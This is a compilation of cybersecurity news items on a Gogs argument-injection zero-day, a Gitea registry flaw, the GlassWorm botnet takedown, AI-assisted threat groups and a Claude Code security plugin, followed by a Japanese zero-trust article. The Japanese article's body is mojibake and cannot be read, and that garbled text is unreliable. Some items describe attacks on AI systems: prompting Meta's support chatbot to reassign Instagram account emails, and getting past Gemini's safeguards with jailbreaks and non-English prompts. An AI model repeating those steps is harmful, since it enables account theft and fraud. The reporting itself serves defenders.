comments. In addition to taking down the GlassWorm infrastructure, CrowdStrike has instructed the infected endpoints to beacon to the benign IP address 164.92.88[.]210. Organizations are advised to check for connections to this IP address to identify potential infections. Despite these efforts, the broader economics of repository abuse remain an ongoing issue. Open-source ecosystems continue to offer attackers low-cost distribution channels with a massive reach when compared to traditional software. This also means operators behind such campaigns can resurface under new accounts, domains, or package names. In other words, it's only a temporary disruption, not eradication. CERT-In Urges Organizations to Patch Exploited Flaws Within 12 Hours - Organizations in India have been urged to patch actively exploited vulnerabilities impacting internet-facing or "crown jewel" systems within 12 hours, where feasible, so as to better respond to the speed artificial intelligence (AI) now brings to cyber attacks. CERT-In stopped short of framing the timelines as binding, describing them as indicative expectations to be applied according to operational criticality and threat exposure. The agency also warned that AI-assisted attacks are dramatically compressing the time between vulnerability disclosure and exploitation. The framework also recommends one-day remediation for critical externally exposed vulnerabilities, three days for critical internal vulnerabilities affecting high-value systems, and five days for high-severity flaws based on risk prioritization. GREYVIBE Leans on AI for Ukraine Attacks - A previously undocumented Russian group codenamed GREYVIBE has been found to make extensive use of large language models (LLMs) in its attacks against private, government, and military organizations in Ukraine. The end goal is to gather intelligence for the ongoing war. "While the activities align with Russian state interests, several observed indicators suggest the group has ties to the broader cybercrime ecosystem, with the group potentially involving current or former cybercriminal actors," WithSecure said. The threat actor is believed to have been active since August 2025. What's notable is the extent to which AI appears to be enmeshed throughout the operation. The group's use of AI is believed to be "operationally integrated rather than isolated or experimental." AI Chatbot Recommendations Redirect Users to Cryptojacking Malware - A new campaign is using searches for popular tools in AI chatbots to redirect users to sketchy sites that trick users into downloading booby-trapped executables that drop a cryptocurrency miner on compromised hosts. The goals of the campaign are not merely financially motivated. The threat actors have also been found to establish persistent remote access to compromised hosts through ScreenConnect deployments, which could then be leveraged for follow-on activity, such as data theft, lateral movement, or ransomware. 🔥 Trending CVEs Bugs drop weekly, and the gap between a patch and an exploit is shrinking fast. These are the heavy hitters for the week: high-severity, widely used, or already being poked at in the wild. Check the list, patch what you have, and hit the ones marked urgent first - CVE-2026-8732 (WP Maps Pro plugin), CVE-2026-0257 (Palo Alto Networks PAN-OS and Prisma Access), CVE-2026-27771 (Gitea), CVE-2026-45659 (Microsoft SharePoint), from CVE-2026-9090 through CVE-2026-9098 (Casdoor), CVE-2026-48800, CVE-2026-48778, CVE-2026-48770 (Notepad++), CVE-2026-40933 (Flowise), from CVE-2026-9872 through CVE-2026-9893 (Google Chrome), CVE-2026-32996, CVE-2026-32997 (Veeam Backup & Replication), CVE-2026-44962 (Plesk), CVE-2026-4868, CVE-2026-1402, CVE-2026-6713 (GitLab), CVE-2026-46840, CVE-2026-46775, CVE-2026-46839, CVE-2026-2332 (Oracle), CVE-2026-4480 (Samba), CVE-2025-59199 aka Click Or Trick (Microsoft Windows 11), CVE-2026-9560 (OpenVPN Connect for macOS), CVE-2026-9312 (GitHub Enterprise Server), CVE-2026-3593, CVE-2026-5946, CVE-2026-5947 (BIND 9), CVE-2026-47783 (Memcached), CVE-2026-44930 (Apache CXF), CVE-2026-9089 (ConnectWise Automate), CVE-2026-4115 (PuTTY), CVE-2026-48095 (7-Zip), an argument injection vulnerability in Gogs, a remote code execution vulnerability in Microsoft Visual Studio Code Remote-SSH extension, and multiple vulnerabilities in Roundcube Webmail. 🎥 Cybersecurity Webinars Beyond Zero-Day: How Attackers Actually See Your Network → Zero-days are inevitable. The real battle is what attackers see once they're inside. Join HD Moore (creator of Metasploit) in this webinar as he reveals how to map your network like an attacker - exposing hidden assets, forgotten bridges, and dangerous IT/IoT/OT connections most teams miss. Why Automated Pentesting Falls Short - And How to Fix It → Automated pentesting tools promised comprehensive security validation, but in reality, they only scratch the surface. After a few runs, new findings drop sharply, leaving critical blind spots in detection, response, and control effectiveness. Join Autumn Stambaugh and Can Yüceel of Picus Security as they explain why automated pentesting alone isn't enough - and how to build a complete validation program that actually closes the gaps. 📰 Around the Cyber World New Windows Flaw Under Attack - Belgium's Centre for Cybersecurity (CCB) has warned that a recently patched Windows flaw, CVE-2026-41089, has come under active exploitation in the wild. The vulnerability is a stack-based buffer overflow in Windows Netlogon that allows an unauthorized attacker to execute code over a network. There are currently no details on how the vulnerability is being exploited. The vulnerability was addressed by Microsoft as part of its May 2026 Patch Tuesday update. Anthropic Confirms Mythos Release - Anthropic has confirmed it intends to bring Mythos-class models to "all our customers in the coming weeks" and said it's "making swift progress" on developing stronger cyber safeguards prior to their release. New Linux Flaw CIFSwitch Uncovered - A newly disclosed Linux local privilege escalation (LPE) vulnerability dubbed CIFSwitch has been found to enable low-privileged users to gain root access by abusing a logic flaw between the Linux kernel Common Internet File System (CIFS) client and the userspace helper package, cifs-utils. According to SpaceX security engineer Asim Viladi Oglu Manizada, the kernel-side bug has been around since 2007. A patch for the flaw has been pushed to mainline Linux as of May 19, 2026. Dashlane Warns of Brute-Force Attack - Dashlane said: "user accounts were targeted in a brute force attack by an external party, resulting in the suspension of those accounts as part of Dashlane's built-in security measures." The affected accounts have since been unsuspended. The password management company also noted that it's taking measures to address the issue, adding that there is no evidence of compromise of Dashlane's systems. It's not known who is behind the attack. Global Smishing Operation Impacts 19 Countries - Hunt.io said it identified a coordinated smishing operation spanning 19 countries across Europe, the Americas, and the Caucasus. "The same infrastructure hitting Romanian taxpayers was also targeting DPD delivery customers in the U.K. and Ireland, road police portals in Bulgaria and Armenia, tax authorities in Greece, and T-Mobile users in the United States," the company said. "1,628 malicious URLs confirmed active across 19 countries and multiple sectors." The campaigns are designed to invoke a false sense of emergency using fabricated fines and trick users into making payments and entering their personal information. Microsoft Teams and Google Drive Abused to Deliver Java RAT - An intrusion targeting a customer in the legal industry involved the use of Microsoft Teams voice phishing to deceive the victim into granting remote access via Quick Assist. It was followed by the deployment of a Java-based remote access trojan (RAT) named Nimbus RAT. "Nimbus RAT is a self-contained implant that uses Google Drive and Google Sheets for command-and-control (C2), helping its network traffic appear benign," eSentire said. "From initial Teams contact to RAT execution, the attack took less than 20 minutes." The activity overlaps with similar Teams-based social engineering attacks carried out by BlackSuit affiliates. Tracking Site Visitors Via FROST - New research has shown that malicious websites can track visitors by measuring tiny changes in SSD access times as a side channel, turning normal browser activity into a privacy leak. The attack, named FROST (short for Fingerprinting Remotely using OPFS-based SSD Timing), is a "side-channel attack from JavaScript that exploits OPFS [Origin Private File System] to leak sensitive information from the browser without requiring any user interaction on both Linux and macOS." The attack "uses SSD contention measurements from within the browser to fingerprint user activity on a system," a group of academics from the Graz University of Technology and Liebherr-Transportation Systems GmbH said. "After tricking the victim into clicking a malicious link, an attacker can monitor the victim's activity on the host system, such as website visits and application usage, without further user interaction." The impact of the attack goes beyond website tracking. The study also demonstrated that it's possible to fingerprint application usage, allowing attackers to potentially infer where specific apps were opened. Instagram Exploit Allegedly Enabled Account Takeover - According to Dark Web Informer and ZachXBT, Instagram is said to have suffered from an exploit that made it possible to use Meta AI to reset passwords to accounts with no multi-factor authentication (MFA) enabled. To pull off the attack, bad actors simply had to use a VPN to approximately match their location to the target Instagram account's region, begin the password reset process, and then prompt Meta's AI support chatbot to change the email address associated with the account. The end goal of the attack appears to link the target account with a new email address using the Meta AI chatbot, seize control of high-profile Instagram profiles, and sell them on the gray market for thousands of dollars. According to a report from 404 Media, bad actors have been aware of the loophole since March 2026. The exploit has since been patched, though it's unclear how many accounts were impacted by the exploit. The incident highlights the dangers of granting AI agents overly broad permissions that could be abused to trigger unintended actions without any human confirmation. EvilTokens Abuses OAuth Flow, RatPressto Kit Surfaces - The phishing-as-a-service (PhaaS) platform known as EvilTokens is being used to carry out device code phishing attacks at scale. "These campaigns are notable for abusing the OAuth 2.0 device authorization flow, automating this sophisticated phishing at scale, and using AI to produce realistic, quickly deployable attack infrastructure," Netcraft said. The company said it has seen thousands of attacks using the EvilTokens phishing kit. The development coincides with the emergence of a new phishing toolkit dubbed RatPressto that's being used in an active campaign. The kit, hosted on legitimate-but-compromised WordPress sites, is used to serve ScreenConnect for establishing persistent remote access. "RatPressto has been observed targeting financial organizations, looking to silently exfiltrate credentials, secrets, and sensitive data that could be used to aid further compromise," Fortra said. Solo Russian-Speaking Threat Actor Linked to Patriot Bait Campaign - A solo Russian-speaking threat actor tracked as "bandcampro" ran a 5-year MAGA-themed Telegram channel (@americanpatriotus, approximately 17,000 subscribers) and pivoted to AI-automated content, fraud, and credential theft starting September 2025. "A jailbroken Google Gemini served as the actor's co-worker, generating Q-styled posts, deploying infrastructure, rotating stolen API keys, modeling victim passwords, and running a QAnon-styled chatbot (QFS 2.0 Terminal)," Trend Micro said. "Safeguards were bypassed via jailbreaking and non-English prompting, allowing explicit pump-and-dump prompts and instructions to mutate victim passwords to be processed, showing how frontier-AI safety controls can be circumvented through jailbreaks and non-English prompting." The campaign once again highlights how AI has significantly cut down the resources needed to run influence operations. SonicWall Scanning Spike Recorded - GreyNoise said it observed a "significant new spike in scanning of SonicWall SonicOS management interfaces" between May 9 and May 18, 2026. "Approximately 56% of sessions originate from networks announced in the Netherlands and 44% in Ukraine - together more than 99% of total volume," it said. "A single ASN (AS211736) carries roughly half of the total session volume." New Payload Ransomware Emerges - Cybersecurity researchers have analyzed ransomware families like NightSpire and Payload, with the latter already racking up 50 victims on its leak site since emerging in February 2026. "Although the group initially claimed only a limited number of victims, its operations quickly showed a global footprint, with targets across Egypt, Mexico, and Poland," Dark Atlas said. 🔧 Cybersecurity Tools EvidenceForge → It is an open-source tool from Cisco Talos that generates realistic, multi-format synthetic security logs - including Windows events, Sysmon, Zeek, and more - with strong consistency and causal relationships. It's particularly useful for threat hunting training, detection testing, and research where you need high-quality, non-obvious synthetic data. MCPGuard-Dynamic → It is an open-source project from Facebook that provides kernel-level sandboxing for LLM agent tool calls using the Model Context Protocol (MCP). It combines policy enforcement, argument validation, and eBPF-based system call guards to restrict what potentially untrusted MCP servers can do - helping prevent file access, network exfiltration, and privilege escalation attempts. Disclaimer: This is strictly for research and learning. It hasn't been through a formal security audit, so don't just blindly drop it into production. Read the code, break it in a sandbox first, and make sure whatever you're doing stays on the right side of the law. Conclusion That's the week: too much speed, too many defaults, and not enough people treating "minor" exposed crap like it can become tomorrow's incident report. The pattern is boring until it's your box - attackers keep finding the cheap paths first, because cheap still works. Patch the loud stuff, audit the weird stuff, and don't ignore the boring stuff. That's usually where the fire starts.
thehackernews.comJun 1, 2026extracted
Gogs Zero-Day Exposes Servers to Remote Code Execution
The popular open source self-hosted Git service Gogs is affected by a critical-severity zero-day vulnerability that exposes servers to remote code execution (RCE), Rapid7 reports. The critical-severity issue, assigned a CVSS score of 9.4, is an argument injection flaw that can be exploited by authenticated attackers via pull requests with malicious branch names. In a technical report, Rapid7 explains that the pull requests inject “the –exec flag into git rebase during the ‘Rebase before merging’ merge operation”, leading to command execution with the privileges of the Gogs server process user. “A standard merge creates a merge commit joining two branch histories. A rebase before merge replays the head branch’s commits on top of the base branch to produce a linear history,” Rapid7 explains. While the ‘Rebase before merging’ operation is not enabled by default, any repository owner or administrator can enable it, and any registered user automatically becomes the owner of repositories they create. During rebase, the merge function passes the pull request’s base branch name to the git rebase function without preventing the interpretation of subsequent arguments as flags. Insufficient checks and sanitization against argument injection and the fact that git rebase accepts the –exec flag, which tells Gogs to run a shell command after replaying each commit, allows attackers to include malicious arguments in branch names, which will be executed after each replayed commit. According to Rapid7, the vulnerability can be exploited without user interaction, as the attacker operates entirely within their own account and repository. “Since Gogs ships with open registration enabled by default and no limit on repository creation, an unauthenticated attacker can simply create an account and repository on any default-configured instance,” the cybersecurity firm says. Any repository owner can enable rebase merging with a single toggle in settings, and the entire exploit chain can be operated without interaction from any other user. Attackers with write access to repositories that have rebase enabled can exploit the flaw directly. “The result is arbitrary command execution as the Gogs server process user, giving the attacker the ability to compromise the server, read every repository on the instance (including other users’ private repos), dump credentials (password hashes, API tokens, SSH keys, 2FA secrets), pivot to other network-accessible systems, and modify any hosted repository’s code,” Rapid7 says. According to the cybersecurity firm, Gogs servers across Windows, Linux, and macOS that are running default configurations are affected. Instances with multiple user accounts, a default for many organizations, are impacted the most. Rapid7 has released a Metasploit module that automates the full exploit chain, as well as indicators of compromise (IoCs) to help defenders hunt for potential compromises. Gogs’ maintainers were notified of the security defect in mid-March. Although they acknowledged receiving the vulnerability report, no patch has been released as of the time of publishing. This is the second Gogs zero-day disclosed publicly over the past half a year. In December, Wiz detailed CVE-2025-8110, an improper symbolic link handling issue that had been exploited as a zero-day for months. Related: Critical FortiClient EMS Vulnerability Exploited in Fresh Attacks Related: Microsoft Patches Exploited UnDefend and RedSun Defender Zero-Days Related: New ‘Dirty Frag’ Linux Vulnerability Possibly Exploited in Attacks Related: Critical cPanel & WHM Vulnerability Exploited as Zero-Day for Months
securityweek.comMay 29, 2026extracted
Gitea Vulnerability Exposed 30,000 Deployments to Attacks
A vulnerability in open source, self-hosted Git service Gitea could have allowed unauthenticated attackers to pull private container images from over 30,000 deployments, AI pentesting firm NoScope warns. Tracked as CVE-2026-27771, the security flaw is described as an access control issue impacting Gitea’s built-in container registry. Forgejo, which shares the implementation, is also affected. Other Gitea-derived forks may be impacted as well. Due to the flaw, authentication requirements were not enforced on images marked as private, and the container registry still served them in response to standard, anonymous Docker/OCI pull requests to the registry API. The security defect lurked in Gitea’s code for approximately four years before being patched in version 1.26.2, which was released last week. “Gitea’s container registry has allowed any person on the internet, with no account, no password, and no prior access, to pull what would be considered private container images at first glance from affected instances as if they were public,” NoScope says. Because container images may contain sensitive information such as source code, secrets, and production infrastructure details, the impact from the bug is considerable, the security firm warns. According to NoScope, a Shodan search uncovered over 34,000 internet-facing Gitea instances. Of these, approximately 93%, or 31,750, were likely vulnerable. Analysis of the potentially affected deployments revealed that roughly 4,000 were production systems running on major cloud or VPS platforms. Approximately 7,000 instances, NoScope says, were running on Gitea’s default port. “The data is unambiguous. These aren’t hobby machines. These are organisations that made a deliberate decision to self-host their development infrastructure, running it on production-grade compute, for real workloads,” the AI pentesting firm notes. Organizations are advised to update to Gitea version 1.26.2 immediately, or to change the configuration settings to require authentication for all content access. “Note that this setting is not suitable for instances that intentionally expose some containers publicly; operators in that situation should weigh the trade-off carefully,” NoScope says. Related: Open Source DockSec Uses AI to Cut Through Vulnerability Noise in Docker Images Related: Ghost CMS Vulnerability Exploited to Hack Over 700 Websites
securityweek.comMay 28, 2026extracted
Claude now reviews and fixes vulnerabilities as you write code
Claude now reviews and fixes vulnerabilities as you write code Anthropic introduced a security-guidance plugin for Claude Code that reviews code changes for common vulnerabilities and helps Claude identify and fix issues during the same development session. The company says the plugin is designed to catch issues such as injection flaws, unsafe deserialization, and insecure DOM APIs before code reaches pull requests, reducing the amount of manual security review later in the development process. Once installed, the plugin runs automatically during development sessions, without requiring developers to launch separate tools or remember additional commands. Three security review stages The plugin operates through three review stages integrated into the coding workflow. Each stage targets different categories of security issues, from unsafe function usage to deeper logic flaws. The first layer runs during file edits and performs lightweight pattern checks without calling a model. The system looks for risky constructs and commonly abused libraries, including functions such as eval(), new Function(), os.system(), and child_process.exec(). The checks also target unsafe deserialization methods and browser injection patterns tied to dangerouslySetInnerHTML and .innerHTML= usage. A second review stage activates after each model turn. At this point, Claude analyzes the complete git diff generated during the session to identify vulnerabilities that pattern matching may miss. The documentation says the review can identify problems involving authorization bypass, insecure direct object references, injection flaws, server-side request forgery, and weak cryptography. The deepest review runs when Claude performs commits or pushes through its Bash tool. During this stage, the system reviews surrounding files, sanitizers, and related code paths to validate findings and reduce false positives. Developers can extend all three review layers with custom rules and repository-specific security checks. Anthropic also noted that it has been using the plugin internally. “Across our internal rollout and benchmarks, we’ve seen a 30–40% decrease in security-related comments on PRs opened using the plugin. The plugin serves as a lightweight first pass, catching issues before a full code review,” the company said. Availability and requirements The plugin is free for all users and available on all plans. Instant security checks run without model calls and do not add usage costs. Deeper reviews use the same Claude usage budget as standard requests. The plugin requires Claude Code version 2.1.144 or later and Python 3.8 or newer. The deeper review stages work only inside git repositories, while the lightweight pattern checks can run in any directory.
helpnetsecurity.comMay 27, 2026extracted
GlassWorm Botnet Disrupted
The GlassWorm botnet that has been targeting the open source software ecosystem for over six months has been disrupted, cybersecurity firm CrowdStrike reports. Together with Google and the Shadowserver Foundation, CrowdStrike took down GlassWorm’s four command-and-control (C&C) channels simultaneously, preventing access to the infected machines and the delivery of fresh payloads. The malware has been using the Solana blockchain for C&C infrastructure, with Google Calendar, the BitTorrent peer-to-peer network, and traditional servers hosted on commercial VPS providers serving as backup C&Cs. GlassWorm’s operators have been encoding C&C addresses in the memo fields of blockchain transactions, which cannot be modified or deleted. The BitTorrent network was used to store configuration data against hardcoded public keys, Google Calendar was used to store Base64-encoded C&C paths in event titles, and the traditional C&C servers were used to host payloads. “The combination of blockchain, peer-to-peer, and legitimate web services as resolution layers was designed to be resilient against takedowns — a dynamic front protecting the actual C&C servers behind multiple layers of indirection,” CrowdStrike notes. By taking down all four channels at the same time, the cybersecurity firms severed the operators’ access to the infected machines and their ability to deliver new instructions. First spotted in October 2025, GlassWorm has been relying on Unicode variation selectors to hide its code in code editors and make it invisible to the human eye. The self-propagating malware was initially distributed via trojanized Visual Studio extensions via the OpenVSX marketplace. In November, however, it also emerged on GitHub. In 2026, GlassWorm attacks continued to target VS developers and other open source software ecosystems. In March, multiple Python projects were compromised. “The operators behind Glassworm are well-resourced and persistent. Over the course of more than a year, they continuously evolved: adopting new programming languages (from JavaScript to Rust to Zig), expanding across package ecosystems (VSCode, npm, PyPI, GitHub), and building redundant infrastructure designed to survive takedown attempts,” CrowdStrike says. GlassWorm is designed to steal sensitive information (such as NPM, GitHub, and Git credentials) and funds from dozens of cryptocurrency extensions. It also deploys SOCKS proxy servers and hidden VNC servers for remote access to the infected machines. The attackers’ access to stolen credentials created an ongoing risk of high-impact supply chain compromises beyond the victim developers. All consumers of potentially impacted software, including enterprises and other types of organizations, were also exposed to compromise. According to CrowdStrike, evidence suggests that GlassWorm’s operators are of Russian origin: the malware checks the system’s locale and avoids infecting machines in CIS countries, and its code contains Russian-language comments. “This takedown matters beyond the botnet. Glassworm marked a significant shift in the threat landscape that should serve as a wake-up call for every organization that ships or consumes software. Adversaries are no longer just targeting products, they’re targeting the developers who build them,” CrowdStrike notes. In addition to taking down the GlassWorm infrastructure, CrowdStrike has instructed the infected machines to beacon to the benign IP address 164.92.88[.]210. Organizations are advised to check for connections to this IP address to identify potential infections. “As long as developer environments, build pipelines, and code repositories remain under-protected, every organization that consumes software inherits the risk of everyone who produces it. Glassworm demonstrates that attackers know this and are investing in resilient infrastructure to maintain persistent access to developer ecosystems,” CrowdStrike notes. Related: ‘First VPN’ Cybercrime Service Disrupted, Administrator Arrested Related: Microsoft Disrupts Malware-Signing Service Run by ‘Fox Tempest’ Related: Tycoon 2FA Fully Operational Despite Law Enforcement Takedown
securityweek.comMay 27, 2026extracted
脱「VPN安全」神話 さくらインターネットが「ゼロトラスト前提」で積み重ねた、マネできる緩和策
2026�N3��3���A�uITmedia Security Week 2026 �~�v�́u�[���g���X�g�v�Z�N�V�����ŁA������C���^�[�l�b�g��CISO�ACIO�߂�]���z��������u���ɓo�d�����B ���̋L���͉������ł��B����o�^�i�����j����ƑS�Ă������������܂��B �@�e�����[�N��N���E�h���p���O��ƂȂ�A�l�b�g���[�N���E�Ɉˑ����Ȃ��Z�L�����e�B�v�����߂��鍡�A������C���^�[�l�b�g�͂ǂ̂悤�ɃZ�L�����e�B��Ɏ��g��ł���̂��낤���B �@�u�[���g���X�g��O��ɁA�����ƕ֗��ɁA�����ƈ��S�Ɂv�Ƒ肵���u���ŁA�]�����̓[���g���X�g�Z�L�����e�B����ʂȂ��̂Ƃ����A����I�ɉ^�p�ł���悤�ɂ��邽�߂̍l�����ƋZ�p�\�����Љ�A�g�D�\���̉ۑ�Ȃǂɂ��G�ꂽ�B�{�e�ł́A�u�����e��v��B �@�u������̃N���E�h�v���AI����GPU�N���E�h�T�[�r�X�u���Ήv�Ȃǂ���A�k�C���E�Ύ�ɋ���f�[�^�Z���^�[��i���邳����C���^�[�l�b�g�́A���ɖ{�Ђ��\���A���{�e�n�ɋ��_�����B�]�����ɂ��A�R���i�Ђ����������ɑS�Ѓe�����[�N�ɕ��j��]���B2024�N3�������_�ł͑S�]�ƈ���89.9�����e�����[�N�ŋƖ��ɏ]�����A�l�����x�Ƃ��Ă��u���Ԃ肱 �ǂ��ł����[�L���O�v��݂��Ă���B���Ƀo�b�N�I�t�B�X�n�ł�VPN�̈ˑ��x��傫�������Ă���A�[���g���X�g�A�[�N�e�N����ւ̈ڍs���i��ł���B �@��ʓI�ɁA���ẴZ�L�����e�B�v�́A�I�t�B�X�l�b�g���[�N�������u���S�ȗ̈�v�ƒ����A�O���Ƃ̐ړ_�Ƀt�@�C�A�E�H�[����VPN��z�u���鋫�E�h�䃂�f���Ɉˑ����Ă����B�������A���́u�����͈��S���v�Ƃ����_�b�́A����̃��[�N�X�^�C���ɂ���č��ꂩ����Ă���B���ꂪ�A�[���g���X�g�����ڂ���闝�R���B �@�]������VPN�ڑ����ɋN������Ƃ��āA���ӂ���t���[Wi-Fi�Ȃǂɐڑ����Ă���ہADNS�iDomain Name System�j������������邱�Ƃɂ�钆�ԎҍU�������������邱�Ƃ�������BVPN���I���ɂ��Y�ꂽ�ꍇ�A�{����VPN���ɂ���ΏۃT�[�o��T���ɍs�����ۂɁA�ʂ̈��ӂ���T�[�o�ɗU�������\��������B�����āATLS�iTransport Layer Security�j�𗘗p���Ă��Ȃ��Г��V�X�e��������A���̒ʐM�̓p�X���[�h��@�������܂߁A�S�čU���҂̎�ɗ�����B �@VPN�ڑ����ꂽ�N���C�A���g�ɂ�郊�X�N������B����[��������������Ԃ�VPN����ĎГ��V�X�e���ɐڑ�����ƁA���̒[�����N�_�ɁA�{���A�N�Z�X�����̂Ȃ��o���V�X�e����ڋq����ՂȂǂɃ}���E�F�A���L���鋰�ꂪ����B �@VPN�Ɋւ��郊�X�N�̖{���ɂ��č]�����́uVPN�ڑ��ł��C���^�[�l�b�g��Ɠ��l�̃��X�N������ƍl����K�v������v�Ǝw�E����BVPN���u�M���̏v�ł͂Ȃ��A�P�Ȃ�u�ʐM�o�H�̈�v�Ƃ��čl����K�v������Ƃ������Ƃ��B���Ђ�������u�[���g���X�g�v�̓��B�_�́A�P�Ȃ�u�EVPN�v�ł͂Ȃ��A�uVPN���Ȃ��Ă��Г��T�[�r�X���C���^�[�l�b�g��ň��S�Ɏg����v���x���܂ŌX�̃V�X�e���̖h��͂������グ�邱�Ƃɂ���B �@�S�Ẵl�b�g���[�N�����u�M�����Ȃ��v�O��ɗ����A�T�[�r�X�P�ʂŌ��i�ȔF�E�F���ۂ����Ƃ������A���S�i����낤�j�ȋ�Ԃ��\�z���邽�߂ɕK�v�ȃ|�C���g�ƂȂ�B���E�h�䂩��E�p���ăZ�L�����e�B���l���邱�ƁA��v�f�F��p���āg���K�̃��[�U�[�h�ł��s�x�m�F���邱�ƁA�ʐM���Í������邱�ƂȂǂ��|�C���g�Ƃ��ċ�������B �@�l�b�g���[�N��M�����Ȃ��O��ɗ������Ƃ��A�A�C�f���e�B�e�B�[�Ǘ���F�̋������ŗD��ۑ�ƂȂ�B������C���^�[�l�b�g�ł́A�Z�p�I�ȗ��z�_�Ə]�ƈ��̎������𗼗������邽�߂ɔF�؊�Ղ�ϊv���Ă���B �@���{�I�ȍl�����́A�[�����A�]�ƈ��ɂ���Ď����o���ꂽ�l�b�g���[�N���ɂ��炳���O��ɗ����Ƃ���n�܂�B�}���E�F�A������N�������\��������O��ŁA�l�b�g���[�N�P�ʂł͂Ȃ��g�Z�b�V�����h�P�ʂŔF����B�F�v���Z�X�ł́A�P���ȃp�X���[�h�ł͂Ȃ��A��v�f�F��p���A�[���̃A�b�v�f�[�g�A�ڑ����̃l�b�g���[�N��n��A�f�o�C�X�^�N���C�A���g�ؖ����F�ɂ���Ē[�����m�F����ȂǁA���x�ȃ��[�U�[�F�������|�C���g�Ƃ��čl�����Ƃ����B �@�����AVPN��ʂ����A�����Ȃ�V�X�e�����C���^�[�l�b�g�ɂ��炷���Ƃ́A�u��͂�S�z���t���܂Ƃ����낤�v�ƍ]�����B���̌��O�ɑ��ẮA�u�wGmail�x�wMicrosoft Office 365�x�wDropbox�x�Ƃ������g�D�̋@������ۊǂ���N���E�h�T�[�r�X�́A���������C���^�[�l�b�g�ɒ��ڂȂ����Ă���AVPN�Ɉˑ����Ȃ��Ă��A���łȔF�A�A�N�Z�X����A�č����O�Ǘ��Ȃǂ�O��Ɉ��S�����m�ۂ���Ă���B�Z�b�V�����P�ʂŃ��[�U�[��F���邱�Ƃ������d�v�ł���A�wVPN���Ȃ��ƈ��S�ł͂Ȃ��x�Ƃ������Ƃł͂Ȃ��v�Ǝw�E����B�������A�u���X�N�ɉ����đ��w�h���g�ݍ��킹�AVPN���g���Ȃ���TLS�����p����ȂǁA���w�h��͗L�����v�ƕ⑫����B �@�����č]�����́A������C���^�[�l�b�g�ɂ�����[���g���X�g�����ɂ����āA�ǂ̂悤�Ȃ��������������̂�����̓I�ɏЉ��B2020�N����́uSlack�v�uGitHub�v�AOffice 365�Ƃ�����SaaS�̗��p�Ŋ��ɃV���O���T�C���I������������Ă����BTOTP�iTime-based One-Time Password�j��FIDO�iFast IDentity Online�j�ɂ���v�f�F���������Ă������A�X�}�z�A�v���𗘗p����������������Ƃ���A���̕��y����30�����x�ɂƂǂ܂��Ă����B �@�R���i�Ђ��@�ɁA�啝�ȃA�b�v�f�[�g�ɓ��ݐ�B������SSO�i�V���O���T�C���I���j�����p���A�C���^�[�l�b�g����T�[�r�X�𗘗p����ꍇ�͓�v�f�F��K�{�Ƃ��A�w���ɃV�X�e����I���v���~�X�̃h�L�������g�Ǘ��V�X�e�����[���g���X�g���f���ɒu���������B �@�������A�����Ȃ�S�V�X�e���ւ�SSO�Ή��͓���B�����ŔF�v���L�V��ݒu���A�Г��V�X�e���ւ̃A�N�Z�X���ł���悤�Ȋɘa����u�����B����ɂ́uNginx�v�uNginx Lua�v��p���A�Г��G���W�j�A���ߋ��Ɏ��������unginx-lua-saml-service-provider�v�����p���Ă���Ƃ����B �@��v�f�F�ؕ��y�ɂ́ATOTP�̕����g�[�N������]�҂ɗX������ɘa������{�����B�����āA�����d�b�F��SMS�i�V���[�g���b�Z�[�W�T�[�r�X�j�AFIDO2�Ƃ��������l�Ȏ�i�p�\�ɂ��邱�ƂŁA�ȑO�͕��y����30�����炢���������A�Z���ԂőS�ГI�ɗ��p���蒅�����B������̒��ӂɊւ��āA�]�����́uTOTP��FIDO�f�o�C�X�͕����o�^�ł���悤�ɂ��A�����g�[�N���̓������A���^�C���N���b�N���Y���邱�Ƃ�O��Ɍ��������������v�ƁA�g���u������ɃA�h�o�C�X�����B �@�[���g���X�g�A�[�L�e�N����ւ̈ڍs�͋Z�p�I�ȉۑ肾���ł͂Ȃ��B���S�ȔF�؊�Ղ��x����̂́A������K�o�i���X�Ƃ��Ē蒅������u�g�D�v���B�]�����́A���V�X�e����������ݗ�����ȂǑg�D�ʂł̎��g�݂��Љ��B �@�ȑO�̑̐��́A���V�X�e�����������A�Z�L�����e�B�������@�����ɕ��U���A�C���V�f���g�Ή���S��SIRT�iSecurity Incident Response Team�j���L�u�ɂ��u�o�[�������[���v�ō\�������Ƃ����Ǝ�ȍ\���������B�S���������Z�p���̐l�Ԃł͂Ȃ��������Ƃ�����A���̑̐��ł͋Z�p�I�m���Ɋ�Â����v���Ȉӎv���肪��������B �@�����œ��Ђ�2023�N�ACIO�����Ɂu���V�X�e���������v��V�݁B�R�[�|���[�gIT�A�Z�L�����e�B�����A��]��SIRT���W���B �@���̑g�D���v�̐^�̐��ʂ́A�ӎv����̃X�s�[�h�A�b�v�ɉ����A�u�̗p�͂̌���v�ɂ��Ȃ��������Ƃ��ƍ]�����͋�������B�g�D��Ɨ������A���g�D�ł��邱�Ƃm�ɂ������ƂŁA�Z�L�����e�B�G���W�j�A��SIRT�v���ɂƂ��ẴL�����A�p�X����������A�l�ފm�ۂ��e�ՂɂȂ����̂��B �@����ɂ��A�g�D�ύX�O��14�l�������̐����A2026�N1�����_��30�l�K�͂ɔ{�����Ă���B���̑������ꂽ�̐��ɂ��A�O���ϑ��ɗ���Ȃ������ł̐Ǝ㐫�f�f��A24����365���̃C���V�f���g���X�|���X�̐������x�����A�g�D�S�̂̃��W���G���X������I�ɍ��܂����Ƃ����B �@�����̉��v�ɂ��A������C���^�[�l�b�g��MDM�iMobile Device Management�j��EDR�iEndpoint Detection and Response�j�Ȃǂɂ��[���Ǘ��ƁA���I�ȃA�N�Z�X��������x�ɓ����ł����Ƃ����B�I�t�B�X�l�b�g���[�N�Ɉˑ����Ȃ��\���Ɉڍs���A�I�t�B�X�ł�����l�̃C���^�[�l�b�g�ڑ�����ăI�t�B�X�l�b�g���[�N���ł��g�M�����Ȃ��h�\���ɕύX���Ă���B�I�t�B�X�ł��Г����\�[�X�ւ̃A�N�Z�X�ɂ�SSO��N���C�A���g�ؖ����ɂ�錵�i�Ȍ������߂���Ƃ������Ƃ��B �@�[���Ǘ��ł́A���[�J�[���璼�����ꂽPC���]�ƈ����J�����ă��O�C�����邾���ŁA�ݒ肪�����������郊���[�g�L�b�e�B���O�̐����\�z���Ă���BBYOD�iBring Your Own 